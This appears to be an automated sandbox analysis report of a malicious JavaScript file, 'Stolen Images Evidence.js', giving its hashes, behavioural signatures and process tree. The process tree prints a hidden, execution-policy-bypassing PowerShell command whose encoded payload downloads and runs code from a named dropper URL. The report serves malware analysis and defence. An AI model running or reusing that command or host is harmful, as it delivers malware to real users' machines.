Analysis
-
max time kernel
13s -
max time network
67s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
27-07-2021 19:27
Static task
static1
Behavioral task
behavioral1
Sample
Stolen Images Evidence.js
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Stolen Images Evidence.js
Resource
win10v20210408
windows10_x64
0 signatures
0 seconds
General
-
Target
Stolen Images Evidence.js
-
Size
23KB
-
MD5
86c4c4a86388ab87b8166563fc6080b9
-
SHA1
a22941692d34245363e1ed75a2e55f9e439f3e2d
-
SHA256
6961814b2c02d34f6eb8da26d59c3e555763f28680ed67bd7c6b30994dba74d3
-
SHA512
9005d46de018ce0409a2a8f0bd7afe611636c88e5f503b4d0e22ef72dbec7b0240a3f1c12b6711a07dc839d04225df5f3fcee4db8c68edf4eb8a58a7aef71ebc
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://munardis.space/222g100/index.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 3948 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2840 3948 WerFault.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exeWerFault.exepid process 3948 powershell.exe 3948 powershell.exe 3948 powershell.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3948 powershell.exe Token: SeDebugPrivilege 2840 WerFault.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
wscript.execmd.exedescription pid process target process PID 652 wrote to memory of 2360 652 wscript.exe cmd.exe PID 652 wrote to memory of 2360 652 wscript.exe cmd.exe PID 2360 wrote to memory of 3948 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 3948 2360 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3948 -s 22964⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2360-114-0x0000000000000000-mapping.dmp
-
memory/3948-115-0x0000000000000000-mapping.dmp
-
memory/3948-121-0x000002791BB70000-0x000002791BB71000-memory.dmpFilesize
4KB
-
memory/3948-124-0x0000027919B60000-0x0000027919B62000-memory.dmpFilesize
8KB
-
memory/3948-125-0x0000027919B63000-0x0000027919B65000-memory.dmpFilesize
8KB
-
memory/3948-130-0x000002791BD20000-0x000002791BD21000-memory.dmpFilesize
4KB
-
memory/3948-135-0x0000027919B66000-0x0000027919B68000-memory.dmpFilesize
8KB